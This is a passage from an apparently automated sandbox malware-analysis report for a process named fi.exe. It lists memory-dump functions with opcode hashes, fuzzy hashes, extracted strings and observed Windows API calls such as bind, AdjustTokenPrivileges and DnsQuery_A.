                                              • Instruction Fuzzy Hash: 76617A17B5E5925AEE11F33D74B60F97F60DF8233671410B7E0CC890A3DD48689E8A95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033201A8, Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1f2fdccfe46b097dfcdb57d6ff3019bda4960d41c8311d7281d11d03657ee19
                                              • Instruction ID: 632b227e8563d2de50356f199946f36974bc660bcbc5c64b01dd3f0f74ca3efc
                                              • Opcode Fuzzy Hash: d1f2fdccfe46b097dfcdb57d6ff3019bda4960d41c8311d7281d11d03657ee19
                                              • Instruction Fuzzy Hash: F5410726B5E9914BEA51F33D24B60F93FA0DF8133570800B7E08C8A0A7ED48689E8691
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033202C0, Relevance: .1, Instructions: 141COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aff997f631eff4e27c01b2d264afcb91434cd08cc66db6f0db5de5835b612e8f
                                              • Instruction ID: 4ae9cbe2b203e7d34012b16951fe356cdd51f1c69fd53b40e78ad883f0f2879a
                                              • Opcode Fuzzy Hash: aff997f631eff4e27c01b2d264afcb91434cd08cc66db6f0db5de5835b612e8f
                                              • Instruction Fuzzy Hash: 5341B230F1894D8FDB84EF68C4A4AADBBE1FF58300F5045B6E00DD7256DA38A945CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033209B9, Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c2a1f0d7638155c1751a189ff5e080c3d4bfda72437f4cca0e81b6cc9ff84be
                                              • Instruction ID: b6fb4895edce56850bc35f01fc9e3d517fccc6a51582d6ca7805dd881689e73e
                                              • Opcode Fuzzy Hash: 6c2a1f0d7638155c1751a189ff5e080c3d4bfda72437f4cca0e81b6cc9ff84be
                                              • Instruction Fuzzy Hash: DE311831B1DE4A8FEB58F72898A67BA77D0EF99710F04017EE04ED3193DD28A8458352
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03320210, Relevance: .1, Instructions: 107COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fabfe74a69a51bbf32e08cb5f480835fdb1f8f72313c098bac9e3fa94f8db433
                                              • Instruction ID: 5ee05ccac37a7140d10361437175824f20fd001fae4dd04aa64f5b5ee2cb67fb
                                              • Opcode Fuzzy Hash: fabfe74a69a51bbf32e08cb5f480835fdb1f8f72313c098bac9e3fa94f8db433
                                              • Instruction Fuzzy Hash: 99313626B0E9955FEA51F32D64F55F93FA0DF8533671800B7E08CC60A3ED48588E8651
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03320248, Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 925d580676dd69ab0af086e839f6ff4cdc448d2430a70d883492c2b9c3790b96
                                              • Instruction ID: 2cd031998fc81245c7765c5ad70ec1d6caebdf44fc08b3c357b4db5562ffe677
                                              • Opcode Fuzzy Hash: 925d580676dd69ab0af086e839f6ff4cdc448d2430a70d883492c2b9c3790b96
                                              • Instruction Fuzzy Hash: 87112226B5A8698FEA50F32D70F55F93BA0DF9533671400B3E08CC60A3DD48589E8A90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033205D5, Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2d5feced9cdd516baee7fcae9d33b8d37cf9fb9bff6ec010315fbc3d26d0f264
                                              • Instruction ID: 3d95fd87cc639fc3619067533c96d7479d88f047996bfb62873950bf6ada02ad
                                              • Opcode Fuzzy Hash: 2d5feced9cdd516baee7fcae9d33b8d37cf9fb9bff6ec010315fbc3d26d0f264
                                              • Instruction Fuzzy Hash: C5217C30F0DA1B8AFB9D73B560F22B92695AF84740F40007AE44DE65CBDD1CF80D8662
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03320B59, Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83939f0003c39e222b94e04c189b11c22dced1abdd951a78b78349f85356f55f
                                              • Instruction ID: d0d6fcd30af5c28aad491f5fd062577a4ff7f15ad741f7e20d47a56847c096cc
                                              • Opcode Fuzzy Hash: 83939f0003c39e222b94e04c189b11c22dced1abdd951a78b78349f85356f55f
                                              • Instruction Fuzzy Hash: 4D11C22070EAC54FE79AF33854A9BA53FD1AB96225B0901F6E04CCB0B3CA588845C342
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03320298, Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7bd86bd852414bb156d0f072a7ef6bffda6b0a7005c06d2f579a19be04b584da
                                              • Instruction ID: 95b74d3cbdd17a8cf3f9a42968c26a56931d78f4d40d7f612d54ee361178d52f
                                              • Opcode Fuzzy Hash: 7bd86bd852414bb156d0f072a7ef6bffda6b0a7005c06d2f579a19be04b584da
                                              • Instruction Fuzzy Hash: D6F09021B19C198FAB94F22D50E8AF937D5DFA92267100177E04CC32A3DD089C8A8781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033202B0, Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 380b3818182c9f59d5c37f1ab49de7e2edc91d21acfdd20b456cb9279dab1378
                                              • Instruction ID: 3780f65c52a678b9a5a7d1cef6d3695c1c05c0016d8c66ace5ae050bd099d6f7
                                              • Opcode Fuzzy Hash: 380b3818182c9f59d5c37f1ab49de7e2edc91d21acfdd20b456cb9279dab1378
                                              • Instruction Fuzzy Hash: 18D05220B24E094AA3E8F23900ADBBA44CACBA8A05B100176F40DE2297DC08A8058280
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Analysis Process: fi.exe PID: 6616 Parent PID: 6428 fi.exeCOMMON

                                              Executed Functions

                                              Function 022E3850, Relevance: 2.0, Strings: 1, Instructions: 754COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: >_?r
                                              • API String ID: 0-2961507119
                                              • Opcode ID: 4bf4eb4c57169659bf669f334d49b0acaec2b3905e813f801a1a4a662b8ac606
                                              • Instruction ID: dd27a75d2653c0b53210c97443c2f844496d01fbbbe83f63c3c4272b5f1cc9b8
                                              • Opcode Fuzzy Hash: 4bf4eb4c57169659bf669f334d49b0acaec2b3905e813f801a1a4a662b8ac606
                                              • Instruction Fuzzy Hash: 6A42D471A10206CFCF15CFA8C8809BDBBF2FF84301B5585AAE9169B25AC771EC41DB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022EB56A, Relevance: 1.9, Strings: 1, Instructions: 667COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: r
                                              • API String ID: 0-1812594589
                                              • Opcode ID: 412ef3d834dfa0dcaeafeda4c92597066053e23b54ea2b5f5eb7006176023876
                                              • Instruction ID: 2f6e1a91ac96cc178604de04bcb2ea98ec67633a1921878fcb1326e11a46168e
                                              • Opcode Fuzzy Hash: 412ef3d834dfa0dcaeafeda4c92597066053e23b54ea2b5f5eb7006176023876
                                              • Instruction Fuzzy Hash: 4F523670A10606CFCB14CF98C584AADFBF2FF88314F958669D45AAB655D730E882CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023428A9, Relevance: 1.6, APIs: 1, Instructions: 87networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • bind.WS2_32(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 0234294B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: bind
                                              • String ID:
                                              • API String ID: 1187836755-0
                                              • Opcode ID: 80c82aac5b84834189925e6919fd6db588b71fd1e130949f14627273f29f1470
                                              • Instruction ID: 468a3487d6253e213a96659f0e1dbf3f9eb34e7de591d8b4d5139a2f07e84fc8
                                              • Opcode Fuzzy Hash: 80c82aac5b84834189925e6919fd6db588b71fd1e130949f14627273f29f1470
                                              • Instruction Fuzzy Hash: C03180725093C4AFD7128B25DC54F96BFB8AF07220F0884DBED849B153D264A909C772
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023410A3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                              Download Yara Rule
                                              APIs
                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 02341123
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: AdjustPrivilegesToken
                                              • String ID:
                                              • API String ID: 2874748243-0
                                              • Opcode ID: 9254bc3df92d3f9235fd5d9fb4fd79e68833e055ff3704502ae92e6d7fbd7d1d
                                              • Instruction ID: bdc8cec63b677e04e94ff3c9156ab9e21f8a001ef440c498d171d9b5f9c02e6c
                                              • Opcode Fuzzy Hash: 9254bc3df92d3f9235fd5d9fb4fd79e68833e055ff3704502ae92e6d7fbd7d1d
                                              • Instruction Fuzzy Hash: 3921A176509784AFEB228F25DC44B52BFF4EF06210F0884DAE9898F563D371A948CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023412DF, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtQuerySystemInformation.NTDLL ref: 02341355
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: InformationQuerySystem
                                              • String ID:
                                              • API String ID: 3562636166-0
                                              • Opcode ID: 52bf43dc0d23a81de12603a4070ecbc1aa47bf3a0f5cc8c1e6c46930f4968004
                                              • Instruction ID: 709ab6c117198397ce4cbde48f35473ca576b4becebba343ddd7c5e295f2f179
                                              • Opcode Fuzzy Hash: 52bf43dc0d23a81de12603a4070ecbc1aa47bf3a0f5cc8c1e6c46930f4968004
                                              • Instruction Fuzzy Hash: 0121AE764097C0AFDB238B21DC45A52FFB4EF17214F0980DBED888B163D265A909DB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023428EA, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • bind.WS2_32(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 0234294B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: bind
                                              • String ID:
                                              • API String ID: 1187836755-0
                                              • Opcode ID: 8f92179c48300b5bf1ca15630934d76b36880205c2e1a9ec65dbcfd094682659
                                              • Instruction ID: 7e5afa89f33bac2f79c7aeb4c21f0de5f2a2bbb3ce388c3b47913dd304313e78
                                              • Opcode Fuzzy Hash: 8f92179c48300b5bf1ca15630934d76b36880205c2e1a9ec65dbcfd094682659
                                              • Instruction Fuzzy Hash: 56119071500204AEEB10CF55DC85F97FBECEF05320F1484ABEE44AB241D674A504CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023410DA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule
                                              APIs
                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 02341123
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: AdjustPrivilegesToken
                                              • String ID:
                                              • API String ID: 2874748243-0
                                              • Opcode ID: a7f7758fe6d5bbf112124e7214be1bd83104be04c70ec7f34921f6b027bcc27c
                                              • Instruction ID: d93d39b8b67c6cb23a23c2f689db9e2881e19691db6965ca2a6a5255c4ea816d
                                              • Opcode Fuzzy Hash: a7f7758fe6d5bbf112124e7214be1bd83104be04c70ec7f34921f6b027bcc27c
                                              • Instruction Fuzzy Hash: 9F1170355006049FDB20CF55D884B56FFE8EF04220F0884AADD898B656D771E458CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340D66, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemInfo.KERNELBASE(?), ref: 02340D98
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: InfoSystem
                                              • String ID:
                                              • API String ID: 31276548-0
                                              • Opcode ID: 4d4a07e8dedbd9a776bf6f17eec97472e69371acb31b037889165b10beb9f653
                                              • Instruction ID: 3fcbe1331919733dcac4eb04340b50b1dc29a089f32788022f2f98c498c8a12b
                                              • Opcode Fuzzy Hash: 4d4a07e8dedbd9a776bf6f17eec97472e69371acb31b037889165b10beb9f653
                                              • Instruction Fuzzy Hash: DC01A2315042449FDB14CF15D884766FFE4DF05220F18C4EBDE498F206D6B5B408CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0234131A, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtQuerySystemInformation.NTDLL ref: 02341355
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: InformationQuerySystem
                                              • String ID:
                                              • API String ID: 3562636166-0
                                              • Opcode ID: 909079b8a28225dbf871689c12cacc111073f629abdb60f0b60b3a7154a0297d
                                              • Instruction ID: af14e4b7a77f9c8ef4ab3df29a77765ab06ca31ab83830803468e3aacda07c5e
                                              • Opcode Fuzzy Hash: 909079b8a28225dbf871689c12cacc111073f629abdb60f0b60b3a7154a0297d
                                              • Instruction Fuzzy Hash: D0017C35400A44DFDB208F15D844B66FFE4EF04324F08C09ADE894AA12D7B5E458DB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E23A0, Relevance: .5, Instructions: 505COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e52166a87622412904501adfde8c0f3f48cb95e92d3096292fdcd6cc5ed33e13
                                              • Instruction ID: 8b1055bef18c7dda4c87aba82f94a04074dd1f3979d1fc626b9478e5dab7b3ef
                                              • Opcode Fuzzy Hash: e52166a87622412904501adfde8c0f3f48cb95e92d3096292fdcd6cc5ed33e13
                                              • Instruction Fuzzy Hash: 3112C130A20215CFDB24DFA5C89066DBBF6BF88305F948229D807EB359DB789985DF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E8788, Relevance: .5, Instructions: 505COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c38366562bf03662c6748a35c38afbbfc0d09720af781f5af0cf86d7e3dd7a58
                                              • Instruction ID: 5c0799cba6845f66674c367304088b97dd42c1377f84f678ae6f11455b263728
                                              • Opcode Fuzzy Hash: c38366562bf03662c6748a35c38afbbfc0d09720af781f5af0cf86d7e3dd7a58
                                              • Instruction Fuzzy Hash: 83129E71A20215CFDF14EFB4C58036EBBF2FF98304F948569D4569B2A8DB789882DB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E2FA8, Relevance: .2, Instructions: 239COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1875d00a16e14f1e8b13d34de02d3c55b57c991555946813696bc5ac432f64be
                                              • Instruction ID: 2ab005ed856c44723f476d7180759220b640f63d1eba117b57291cb83adb36a2
                                              • Opcode Fuzzy Hash: 1875d00a16e14f1e8b13d34de02d3c55b57c991555946813696bc5ac432f64be
                                              • Instruction Fuzzy Hash: F581AD31F211159BDB04DBA9C850A7EBBF3AFC8711F6A80B5E4069B369DE719C018B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022EDDCD, Relevance: 3.8, Strings: 3, Instructions: 89COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: 0e$0e$0e
                                              • API String ID: 0-2797960476
                                              • Opcode ID: e4de3d3a4bb3fb46c617e821ac2e9c727017a2cf9d0e3dbb4f098be2072f9a9f
                                              • Instruction ID: bb363083bcb5064d139445c9222dd03f60cccec080cf5c44d36ffa814767a086
                                              • Opcode Fuzzy Hash: e4de3d3a4bb3fb46c617e821ac2e9c727017a2cf9d0e3dbb4f098be2072f9a9f
                                              • Instruction Fuzzy Hash: B1310D31340701CFC7A99B7CC86056A7BE3BFC47187A4892CD2469B794DEB6E9078B84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E02E8, Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: :@:r$`5ar
                                              • API String ID: 0-3512261011
                                              • Opcode ID: 50ef010000d3ebe14d1f2c5dba558078006976041e0a75ea04556c3f2ed59095
                                              • Instruction ID: b5f2e319d37a41edb6ae2960c0c77b3ed8c5cdbee2108bce35772bf2d59fb8f5
                                              • Opcode Fuzzy Hash: 50ef010000d3ebe14d1f2c5dba558078006976041e0a75ea04556c3f2ed59095
                                              • Instruction Fuzzy Hash: A3717E30B142058FDB08DFA8C450B6E7BF2AFC9710F54806AE506AF795DBB19D06DB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E2D58, Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $>_?r
                                              • API String ID: 0-334426466
                                              • Opcode ID: 0bac8fc4438a1fce99b7767901d4d9fb8b2408fde28297e9ee008f70ab169f13
                                              • Instruction ID: f3ee937b4feafdfd84dcbfdae559bc5b493b16f478685ef8c58de84761fa9371
                                              • Opcode Fuzzy Hash: 0bac8fc4438a1fce99b7767901d4d9fb8b2408fde28297e9ee008f70ab169f13
                                              • Instruction Fuzzy Hash: 6B41E470E24225CBCF14EFA5C8406BEB7AAABC0204B988666DD179B609D771E802D751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E21F8, Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: ne$r*+
                                              • API String ID: 0-3485995231
                                              • Opcode ID: b64f57e94fda45af0a9c96830090f403f0c22eb1675db43a09d81abb7370928f
                                              • Instruction ID: 1ad4af2e408c1560614e53fe44c9b7e49b82232d8e65a7330f4bc95d2f33f99c
                                              • Opcode Fuzzy Hash: b64f57e94fda45af0a9c96830090f403f0c22eb1675db43a09d81abb7370928f
                                              • Instruction Fuzzy Hash: 4D412A30E28209CFCF44DBE4C5556AEBBB5BF44304F90826AD803AB268D7B58A45DF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022EDC67, Relevance: 2.6, Strings: 2, Instructions: 79COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: e$l_r
                                              • API String ID: 0-1812722675
                                              • Opcode ID: 31843fdfe1197cb1092f443d0ea759d648ffeb6e2759231f5d7f4e746ec16b8b
                                              • Instruction ID: de460819aefb56bceb502fc952cfee00cdef096de048ddfdc62d2241d1aff087
                                              • Opcode Fuzzy Hash: 31843fdfe1197cb1092f443d0ea759d648ffeb6e2759231f5d7f4e746ec16b8b
                                              • Instruction Fuzzy Hash: 9C21E236624204CBCF149AA8D4003FEBBFAEB89350F50487AE407DB344DBB19D42E791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E12A0, Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $g^r
                                              • API String ID: 0-3653196314
                                              • Opcode ID: 089d618ebb494650705d3198fe307ba09b459d3764a5941aa498327cce64b42c
                                              • Instruction ID: f68e2c5ae2c496b23fd280edf435bea927837b4fbcd8bc80fa20a6a267cbbda7
                                              • Opcode Fuzzy Hash: 089d618ebb494650705d3198fe307ba09b459d3764a5941aa498327cce64b42c
                                              • Instruction Fuzzy Hash: 0B220834A10605CFCB24DF68C490A6ABBF2FF88314F90C5A9D85A9B759DB34AD45CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02341460, Relevance: 1.6, APIs: 1, Instructions: 124networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DnsQuery_A.DNSAPI(?,00000E2C,?,?), ref: 02341556
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: Query_
                                              • String ID:
                                              • API String ID: 428220571-0
                                              • Opcode ID: 08e77d5a0af5b8d9a990eef4bb3b2754736807097f56c31a7cb11a191664af83
                                              • Instruction ID: ae4537ac646cf94fc632ff12dd685f99b3e6a94d13508c49aa2ad245773bd222
                                              • Opcode Fuzzy Hash: 08e77d5a0af5b8d9a990eef4bb3b2754736807097f56c31a7cb11a191664af83
                                              • Instruction Fuzzy Hash: 8A41146500E7C06FD3138B358C61A61BFB4EF47614B0E85CBE884CF5A3D259690AC7B2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02340390, Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 0234045E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              • Opcode ID: 914820932f6153b2be7c1f3f2dca77e09c17d2379815a57091d3905c14528fcd
                                              • Instruction ID: 863fa6bde84a1a89734d9279d4c13f447b3b6a0d614bbe48fa226176c84deaed
                                              • Opcode Fuzzy Hash: 914820932f6153b2be7c1f3f2dca77e09c17d2379815a57091d3905c14528fcd
                                              • Instruction Fuzzy Hash: AA31D572104344AFE7228F20CC41FA6FFB8EF06714F04859EEA859B192D3A5A949CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023407F4, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 02340899
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 29a10e3cbe933531dfaa32b5883be2c0af8856d3fdb30de42cefa56186c485fa
                                              • Instruction ID: 27c300a172b1765794bcafa2e8a4d8e85f38d640b1a3b31f873ab80d94c275d0
                                              • Opcode Fuzzy Hash: 29a10e3cbe933531dfaa32b5883be2c0af8856d3fdb30de42cefa56186c485fa
                                              • Instruction Fuzzy Hash: 0E319E71504384AFE726CF25DD44F66BFE8EF45210F0884AEEA858B252D375E809CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02342B7F, Relevance: 1.6, APIs: 1, Instructions: 90windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 02342C35
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: FormatMessage
                                              • String ID:
                                              • API String ID: 1306739567-0
                                              • Opcode ID: e14a892efe78db95b90c5fa47c28b7439cc9c4d4500d0bbb1643c2f8239da001
                                              • Instruction ID: e7d8928a36d8d8f7d76e842c4a4c5207adc339069c8a3c3d0fa162673f0905c4
                                              • Opcode Fuzzy Hash: e14a892efe78db95b90c5fa47c28b7439cc9c4d4500d0bbb1643c2f8239da001
                                              • Instruction Fuzzy Hash: 70318F7240D3C46FD7038B218C61A52BFB4EF87610F1A80CBD984CF2A3E6246909C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02342360, Relevance: 1.6, APIs: 1, Instructions: 90timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessTimes.KERNELBASE(?,00000E2C,9CB165A5,00000000,00000000,00000000,00000000), ref: 023423FD
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: ProcessTimes
                                              • String ID:
                                              • API String ID: 1995159646-0
                                              • Opcode ID: d322df5e87f11f79ebee97cbcb8f08fe410957089277d428185a032d7cf872fb
                                              • Instruction ID: fd98f7329cc84423d23bf17e24e4396abd1ff8f1f77475085537ae076517eb50
                                              • Opcode Fuzzy Hash: d322df5e87f11f79ebee97cbcb8f08fe410957089277d428185a032d7cf872fb
                                              • Instruction Fuzzy Hash: BD31C372109780AFEB128F64DC45F96BFB8EF46324F0884DBE985DB193D225A905CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 023400F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateMutexW.KERNELBASE(?,?), ref: 0234019D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595657960.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false
                                              Similarity
                                              • API ID: CreateMutex
                                              • String ID:
                                              • API String ID: 1964310414-0
                                              • Opcode ID: 4c2da93ee933aaae245f3fbcfe45cd06a9861e2ec43f51a00951c75e821f1229
                                              • Instruction ID: 58e8894753b9fae9a14911d8df9d78556aeaa472ebcaee46948de5a8dd253489
                                              • Opcode Fuzzy Hash: 4c2da93ee933aaae245f3fbcfe45cd06a9861e2ec43f51a00951c75e821f1229
